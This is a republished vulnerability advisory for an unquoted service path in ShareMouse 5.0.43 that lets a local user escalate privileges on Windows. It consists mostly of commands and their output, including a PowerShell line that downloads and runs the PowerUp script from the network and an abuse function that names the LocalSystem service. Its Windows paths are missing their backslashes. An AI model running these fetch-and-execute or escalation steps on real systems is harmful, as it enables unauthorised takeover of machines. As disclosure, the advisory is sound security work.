ShareMouse 5.0.43 – ‘ShareMouse Service’ Unquoted Service Path – Digitalmunition




Exploit/Advisories 1597662358_spider-orange.png

Published on September 9th, 2020 📆 | 7981 Views ⚑

0

ShareMouse 5.0.43 – ‘ShareMouse Service’ Unquoted Service Path

# Exploit Title: ShareMouse 5.0.43 - 'ShareMouse Service' Unquoted Service Path
# Discovery Date: 2020-09-08
# Discovery by: Alan Lacerda (alacerda)
# Vendor Homepage: https://www.sharemouse.com/
# Software Link: https://www.sharemouse.com/ShareMouseSetup.exe
# Version: 5.0.43
# Tested on OS: Microsoft Windows 10 Pro EN OS Version: 10.0.19041

PS > iex (iwr https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1 -UseBasicParsing);
PS > Invoke-AllChecks

ServiceName   : ShareMouse Service
Path          : C:Program Files (x86)ShareMousesmService.exe
StartName     : LocalSystem
AbuseFunction : Write-ServiceBinary -ServiceName 'ShareMouse Service' -Path 

PS >  wmic service where 'name like "%ShareMouse%"' get DisplayName,PathName,AcceptStop,StartName
AcceptStop  DisplayName         PathName                                         StartName
TRUE        ShareMouse Service  C:Program Files (x86)ShareMousesmService.exe  LocalSystem

#Exploit:
# A successful attempt would require the local user to be able to insert their code in the system root path 
# undetected by the OS or other security applications where it could potentially be executed during 
# application startup or reboot. If successful, the local user's code would execute with the elevated 
# privileges of the application.
            

Source link

Tagged with:



Leave a Reply

Your email address will not be published. Required fields are marked *


loading...